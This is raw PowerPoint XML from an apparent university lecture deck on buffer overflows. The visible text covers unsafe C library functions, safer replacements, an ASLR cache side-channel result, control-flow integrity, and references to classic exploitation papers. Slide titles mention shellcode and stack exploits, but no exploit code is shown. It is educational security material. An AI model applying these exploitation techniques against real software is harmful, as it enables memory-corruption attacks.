            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(char *de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr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000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(char *s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> char *format, … )           and many more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1920"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“Safe” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> versions  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>are misleading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>may leave string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>unterminated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2424"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Windows C run time  (CRT):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="624"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:   ensures proper termination</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="3366FF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28600" y="3903133"/>
            <a:ext cx="8686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8600" y="5325533"/>
            <a:ext cx="8686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80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9144000" cy="63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31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9144000" cy="62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42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7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59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9144000" cy="62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95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05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9144000" cy="63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7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9144000" cy="625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6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01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3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05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55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8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81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9144000" cy="62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8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3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9144000" cy="626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80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62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80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8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1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9144000" cy="62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1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4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66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65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69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9144000" cy="62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62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54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9144000" cy="62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9144000" cy="624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29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13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8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08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9144000" cy="630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65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9144000" cy="630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35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9144000" cy="63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8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9144000" cy="62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48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9144000" cy="631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9144000" cy="630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6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61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77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9144000" cy="63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60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9144000" cy="630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3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2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0"/>
            <a:ext cx="9144000" cy="632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9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91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622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42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622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32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9144000" cy="630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58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9144000" cy="62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15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3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2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1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9144000" cy="63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21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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ASLR on the Line</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b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ASLR is an important first line of defense against memory corruptions attacks and a building block for many countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All modern CPU architectures offer cache assisted performance improvements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>NDSS 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>] shows that ASLR and caching are conflicting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980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8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366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Control-Flow Integrity (CFI)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Software execution must follow its execution path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34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366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why CFI?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Change in execution path of a program can be used by an adversary to execute malicious code stored in memory (e.g., buffer overflow)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CFI enforces integrity of a program’s execution flow path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An undefined change in the path of execution by an adversary can be detected using CFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CFI efficiently detects and mitigates buffer overflow, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RoP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attacks, etc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4870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Smashing the stack for fun and profit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://phrack.org/issues/49/14.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploiting format string vulnerabilities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https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once upon a free()</a:t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http://phrack.org/issues/57/9.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on the Line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.cs.vu.nl//~herbertb/download/papers/anc_ndss17.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>pdf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629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9144000" cy="63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49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</TotalTime>
  <Words>8284</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>2104</Paragraphs>
  <Slides>89</Slides>
  <Notes>26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Office Theme</vt:lpstr>
      <vt:lpstr>Buffer Overflow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Linux (32-bit) process memory layout </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Registers</vt:lpstr>
      <vt:lpstr>Registers</vt:lpstr>
      <vt:lpstr>Registers</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Stack Frame</vt:lpstr>
      <vt:lpstr>Viewing Stack Frame with GDB</vt:lpstr>
      <vt:lpstr>Viewing Stack Frame with GDB</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>What are buffer overflows?</vt:lpstr>
      <vt:lpstr>Basic Stack Exploit</vt:lpstr>
      <vt:lpstr>Shellcode of execve</vt:lpstr>
      <vt:lpstr>Basic Stack Exploit</vt:lpstr>
      <vt:lpstr>Basic Stack Exploit</vt:lpstr>
      <vt:lpstr>Basic Stack Exploit</vt:lpstr>
      <vt:lpstr>Basic Stack Exploit</vt:lpstr>
      <vt:lpstr>Basic Stack Exploit</vt:lpstr>
      <vt:lpstr>Basic Stack Exploit</vt:lpstr>
      <vt:lpstr>Basic Stack Exploit</vt:lpstr>
      <vt:lpstr>The NOP Slide</vt:lpstr>
      <vt:lpstr>The NOP Slide</vt:lpstr>
      <vt:lpstr>More on Stack Smashing</vt:lpstr>
      <vt:lpstr>Many unsafe libc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ASLR on the Line</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Control-Flow Integrity (CFI)</vt:lpstr>
      <vt:lpstr>Why CFI?</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>grammar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Buffer Overflow</dc:title>
  <dc:creator>panini</dc:creator>
  <cp:lastModifiedBy>panini</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-27T04:43:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-03T09:44:53Z</dcterms:modified>
</cp:coreProperties>
</file>